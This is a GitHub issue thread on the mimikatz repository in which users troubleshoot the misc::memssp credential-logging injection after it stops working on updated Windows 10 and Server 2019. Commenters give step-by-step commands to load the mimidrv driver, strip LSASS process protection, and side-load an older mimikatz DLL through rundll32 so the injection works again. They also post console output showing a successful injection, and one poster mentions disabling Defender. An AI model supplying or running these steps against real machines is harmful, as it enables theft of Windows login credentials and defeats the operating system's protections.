search

gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz
19.51k stars 3.75k forks source link

misc::memssp don't work anymore #261

Open Slackerok opened 4 years ago

Slackerok commented 4 years ago

Greetings. On the updated W10 and WServer2019, this feature "misc::memssp" no longer works. After its launch, Windows goes into reboot immediately. He writes that there is a problem and needs to reboot. Tested on more computers. In general, can it be fixed somehow?

Papotito123 commented 4 years ago

Hello:. Try this: Run mimikatz > then run ; privilege debug

!+

!processprotect /process:lsass.exe /remove

,then run misc::memssp

But AFAIK ,from Windows 10 Anniversary,,lsass.exe will not keep user password in plain-text. So the whole process can be good but password will be blank/null. Also Windows Defender will try to keep safe lsass.exe process.

Slackerok commented 4 years ago

No, don't work. This situation has recently become blocked. I always removed protection from the process with the command: !processprotect /process:lsass.exe /remove Well, the defender is naturally off.

Papotito123 commented 4 years ago

Hello; This is my output.But I have Windows NT 10.0 build 17763 (arch x64) msvc 150030729 207 ,that is Win 10 1809.

.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)

/ \ ## /*** Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )

\ / ## > http://blog.gentilkiwi.com/mimikatz

'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(commandline) # version

mimikatz 2.2.0 (arch x64) Windows NT 10.0 build 17763 (arch x64) msvc 150030729 207

mimikatz(commandline) # privilege::debug Privilege '20' OK

mimikatz(commandline) # !+ [*] 'mimidrv' service not present [+] 'mimidrv' service successfully registered [+] 'mimidrv' service ACL to everyone [+] 'mimidrv' service started

mimikatz(commandline) # misc::memssp Injected =)

mimikatz(commandline) # exit Bye!

Papotito123 commented 4 years ago

mimikatz-dll.zip Hello: So long time. I installed Win10 2004 19041.450 x64(August 2020). And tested misc::memssp and at first runs and say "injected" but doesn't create mimilsa.log in System32. But I get to works.

From some older mimikatz grab the file mimikatz.dll . Put it in same folder as mimikatz.exe. Open a cmd(as admin) and run mimikatz as ussual > type : privilege::debug > type : misc::cmd Will open a new cmd > type : rundll32 "path-to-mimkatz.dll", main Will open a new mimikatz cmd window > type : misc::memssp

Should work now.

Papotito123 commented 4 years ago

Hello: @Slackerok , did you try my method and worked ?

Thanks.